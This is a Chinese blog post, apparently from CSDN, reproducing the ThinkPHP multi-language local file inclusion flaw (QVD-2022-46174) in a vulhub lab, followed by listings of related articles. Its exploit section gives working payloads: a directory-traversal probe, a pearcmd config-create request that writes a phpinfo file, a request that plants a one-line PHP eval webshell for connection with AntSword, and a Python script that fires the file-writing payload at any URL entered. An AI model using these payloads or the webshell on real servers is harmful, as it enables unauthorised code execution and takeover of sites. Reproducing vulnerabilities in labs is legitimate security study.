ThinkPHP Lang多语言本地文件包含漏洞(QVD-2022-46174)漏洞复现

最新推荐文章于 2024-06-24 19:55:38 发布
最新推荐文章于 2024-06-24 19:55:38 发布
阅读量592 收藏 9
点赞数 19
分类专栏: web安全 python武器库 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45653478/article/details/138254891
版权
本文详细描述了ThinkPHP框架6.0.13版本中的本地文件包含漏洞,涉及多语言功能和pear扩展,介绍了漏洞环境部署、利用方式,以及使用Python脚本进行探测的方法。
摘要由CSDN通过智能技术生成

1 漏洞描述

ThinkPHP是一个在中国使用较多的PHP框架。在其6.0.13版本及以前,存在一处本地文件包含漏洞。当ThinkPHP开启了多语言功能时,攻击者可以通过lang参数和目录穿越实现文件包含,当存在其他扩展模块如 pear 扩展时,攻击者可进一步利用文件包含实现远程代码执行。
影响版本

6.0.1 <= ThinkPHP <= 6.0.13
ThinkPHP 5.0.x
ThinkPHP 5.1.x

2 漏洞环境部署

进入目录
cd  vulhub/thinkphp/lang-rce
部署环境
docker-compose up -d
查看端口
docker-compose ps

访问服务器,表示环境正在成功运行。

3 利用方式

首先,由于多语言功能默认未启用,因此可以尝试包含 以确定是否存在漏洞:

http://192.168.135.132:8080/?lang=../../../../../public/index

如果服务器崩溃并返回 500 错误响应,则存在该漏洞。

然后,尝试通过“/usr/local/lib/php/pearcmd.php”写入数据:

使用如下payload:

http://192.168.135.132:8080/?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/<?=phpinfo()?>+shell.php HTTP/1.1

访问写入的文件

写入一句话木马payload

http://192.168.135.132:8080/?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/<?=eval(@$_POST['password']);?>+shell2.php

使用蚁剑链接

4 使用python脚本探测漏洞

#!/usr/bin/env python
​
import requests
from urllib.parse import urljoin
​
def thinkphp6_lang(url):
    payload=urljoin(url,'index.php?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/<?=phpinfo()?>+shell.php')
    response=requests.get(payload,verify=False)
    url2=url+'shell.php'
    response2=requests.get(url2,verify=False)
    if response2.status_code == 200:
        print("漏洞存在")
    else:
        print("漏洞不存在")
​
if __name__ == '__main__':
    print("注意:本代码仅用于实验和学习目的,请谨慎使用。")
    url = input("请输入目标 URL: ")
    thinkphp6_lang(url)

结果

乐队1
关注
  • 19
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
ThinkPHP v6.0.13 存在反序列化漏洞
OSCS开源安全社区
09-15 1644
OSCS(开源软件供应链安全社区)通过最快、最全的方式,发布开源项目最新的安全风险动态,包括开源组件安全漏洞、事件等信息。ThinkPHP 6.0.13版本中存在反序列化漏洞,攻击者可通过精心设计的 payload 在 Psr6Cache 组件中通过反序列化执行任意代码,甚至接管服务器。避免使用unserialize()方法去反序列化用户输入的数据。ThinkPHP 是一个免费开源的,轻量级的PHP开发框架。该漏洞已存在 POC。
实战:通过tp5.0.5漏洞入侵企业网站
weixin_44763740的博客
07-24 745
下一步就是使用蚁剑连接webshell,看到这里,大家都以为可以直接getshell了吧,但是命运就是这么捉弄人,明明已经将木马包含在日志中,并且有绝对路径,相关函数也没有禁用,这一切看起来都是那么顺利,可就是连接失败。后来我又尝试换冰蝎马,但是因上传做了字符串限制,只能用最简单的一句话木马,其余多一个字符串都会被截掉,那么会不会是编码器的问题呢?以上可知,木马已存在,且路径正确,那一定是连接出问题了。我是身上有点执念的,为了梦想也好,目标也罢,有时候,你不去较劲儿,永远不知道自己能改变什么。
thinkphp语言变量
RemixGdc的博客
01-10 434
LANG_SET
Python武器库开发-武器库篇之ThinkPHP6 多语言本地文件包含漏洞(六十七)
最新发布
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
06-24 1121
这里我们使用Kali虚拟机安装docker并搭建vulhub靶场来进行ThinkPHP漏洞环境的安装,我们进入 ThinkPHP漏洞环境,可以 cd ThinkPHP,然后通过 ls 查看可以搭建的靶场,目前 vulhub关于 ThinkPHP漏洞。可以搭建的靶场有五个。然后我们在浏览器输入就可以访问靶场环境。
ThinkPHP 系列漏洞
SHELLCODE_8BIT的博客
11-18 3638
所有 sql 注入漏洞均在 library/think/db/Builder.php 文件中。1、thinkphp5 SQL注入1漏洞影响版本: 5.0.13
ThinkPHP6.0.13反序列化漏洞分析
蚁景网安学院
10-09 2136
最近有点闲下来了,不找点事干比较难受,打算找点漏洞分析一下,于是就打算看看TP的一些漏洞ThinkPHP6.0.13是TP的最新版,八月份有师傅提交了一个issue指出TP存在反序列化问题,网上也有些师傅分析了一波,不过断点下的比较多,而且部分方法没有阐明其用途,所以我也尝试详细的分析一波。
漏洞通告ThinkPHP远程代码执行漏洞
05-05
漏洞通告】ThinkPHP远程代码执行漏洞
thinkphp实现多语言功能(语言包)
12-19
ThinkPHP框架中实现多语言功能,主要是为了提供更加国际化和本地化的用户体验。这个功能使得网站或应用可以适应不同国家和地区用户的语言需求。以下是如何在ThinkPHP中设置和使用多语言功能的详细步骤: 首先,...
Thinkphp搭建包括JS多语言的多语言项目实现方法
10-25
总之,ThinkPHP框架搭建包括JS多语言的多语言项目实现方法涉及到后端语言包的准备、语言环境的配置与切换、前端JS语言文件的动态生成与加载等步骤。通过上述方法,可以构建一个语言切换方便、用户体验良好的多语言...
Thinkphp6笔记十:多语言配置
qq_29294165的博客
05-08 2130
配置中文、英文两种语言 1.创建语言包文件 app_name/lang/zh-cn.php代码: <?php return [ 'hello' => '欢迎使用thinkphp61', ]; app_name/lang/en-us.php代码: <?php return [ 'hello' => 'welcome use thinkphp6', ]; 2.参数设置(config/lang.php): // 默认语言 'default...
thinkphp漏洞复现
m0_52920608的博客
11-04 629
thinkphp漏洞复现
ThinkPHP v6.0.x反序列化漏洞复现与分析
weixin_45794666的博客
03-02 9770
thinkPHP v6.0.0-6.0.3反序列化漏洞复现与分析 环境搭建 初始环境,需要注意的是,新版v6基于PHP7.1+开发 php-7.2.9 ThinkPHP v6.0.3 使用composer进行安装 composer create-project topthink/think=6.0.3 tp6.0 ⚠️坑点,截止到2021/09/16 ,默认核心安装的为framework=v6.0.9 think-orm=2.0.44 但是到最后面部分代码段已经修复了利用点,所以为了避免大家再次踩坑,请
漏洞复现】多语言文件包含漏洞分析
kali_Ma的博客
12-29 1932
ThinkPHP在开启多语言功能的情况下存在文件包含漏洞,攻击者可以通过get、header、cookie等位置传入参数,实现目录穿越+文件包含,通过pearcmd文件包含这个trick即可实现RCE。直接利用p牛文章中的请求包,需要根据实际情况改变文件名称,写不进去可以考虑多加点…这次我们直接写到网站根目录(注:phpinfo可以查看网站绝对路径)2、官方已发布6.0.14、5.1.42,建议升级至安全版本。1、若无必要,可关闭多语言功能,可参考文档。④50份安全攻防面试指南。⑨历年CTF夺旗赛题解析。
Thinkphp语言最佳解决方案
weixin_38049705的博客
10-22 1718
ThinkPHP语言设置
ThinkPHP语言模块文件包含RCE复现详细教程
ALLEN'Blog
02-14 2144
1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。(非常重要)2、渗透测试基础(一周)①渗透测试的流程、分类、标准②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等3、操作系统基础(一周)
漏洞复现】CNVD-2022-86535-ThinkphpV6多语言
rm -rf *
01-18 2301
Thinkphp语言模块漏洞远程命令执行
thinkphp6.0漏洞复现
qq_44657899的博客
01-19 8331
环境搭建 我打算安装在kali上面,首先下载tp6到kali上 // 1. 下载composer.phar: curl -sS https://getcomposer.org/installer | php // 2. 将 composer 命令移动到bin目录,使之全局可用 mv composer.phar /usr/local/bin/composer // 3. 设置中国全量镜像,提升访问速度 composer config -g repo.packagist composer ht
thinkphp5.0.24文件包含漏洞
06-08
ThinkPHP 5.0.24版本存在一个文件包含漏洞,也称为“ThinkPHP5.0.24远程代码执行(RCE)漏洞”。这个漏洞源于框架中的一个设计缺陷,它允许恶意用户利用特定条件下的参数控制来执行任意文件包含操作,从而可能导致攻击者能够获取敏感信息或执行未经授权的操作。 漏洞细节: - 漏洞存在于`ThinkPHP/Library/Think/Loader.php`文件的`import`方法中,当处理动态导入路径时,没有正确验证和过滤输入。 - 攻击者可以通过构造恶意的`import`调用,如`think/Loader::import('..path/to/file');`,利用这个漏洞来包含和执行他们选择的任意文件。 影响范围和修复: - 这个漏洞可能影响到使用ThinkPHP 5.0.24版本的网站,特别是那些在用户输入未经充分验证的情况下调用`import`方法的应用。 - ThinkPHP团队已经发布了安全补丁,修复了这个问题,用户应该尽快更新到最新版本,或者按照官方文档的指导进行漏洞修复。 相关问题: 1. 怎样避免ThinkPHP应用受到此漏洞的影响? 2. 如何检查我的ThinkPHP项目是否受到了该漏洞影响? 3. 安装了补丁后,还需要做哪些额外的安全措施?
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值